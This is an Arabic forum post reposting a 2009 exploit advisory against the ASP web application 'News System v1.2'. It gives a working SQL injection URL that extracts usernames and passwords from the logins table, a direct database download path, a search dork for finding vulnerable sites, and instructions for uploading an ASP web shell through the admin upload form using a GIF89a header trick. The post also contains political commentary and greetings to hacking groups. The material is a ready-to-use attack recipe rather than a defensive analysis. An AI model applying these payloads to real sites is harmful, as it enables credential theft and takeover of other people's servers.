أقدم لكم ثغرة بتاريخ
24-03-2009
كود:
##############################################################
#
# Title : News System v1.2 ( Id= ) Remote SQL Injection / Remote Shell Upload Vulnerability
# Author : 4ntiw4R
# From : Turkey
# Contact :
root@netsaw.org # ****** : News System v1.2
# Download :
http://www.planet-source-code.com/vb/******s/ShowCode.asp?txtCodeId=8000&lngWId=4# Dork : "News System v1.2"
# Admin login : "/admin/"
# Database Download : /News System v1.2/db/news.mdb
#
##############################################################
# SQL Injection Bug :
#
# Exploit : /News System v1.2/read.asp?Id=SQL
# Example : /News System v1.2/read.asp?Id=-99 union+all+select+0,1,username,3,password,5,6,7+from+logins
#
##############################################################
#
# Remote Shell Upload Bug :
#
# Add this code your shell: GIF89a;
# Here : /News System v1.2/admin/UploadForm.html
# Shell : /News System v1.2/images/news-images/sHELL.asp
#
##############################################################
#
# Special Thanks to :
#
# Kerem125 & JeXToXiC , Agd_Scorp , Rx5 , wh0! , STARTURK , SauDi L0rD , N@bilX , KacaK , Team RaBaT-SaLe , RedRoliX
#
# netRoot , Terrorist Crew / Peace Crew , Netsaw.org , Turkguvenligi.info , Megaturks.net
#
##############################################################
#
# Note :
#
# Israel done a massacre in middle-east and we wont let this get forgotten.Hail the Muslim brothership!
#
##############################################################
# No-ExpLoiT.CoM [ 24-03-2009 ]
موضوع: Remote SQL Injection / Remote Shell Upload Vulnerability 
الثلاثاء ديسمبر 29, 2009 2:04 am
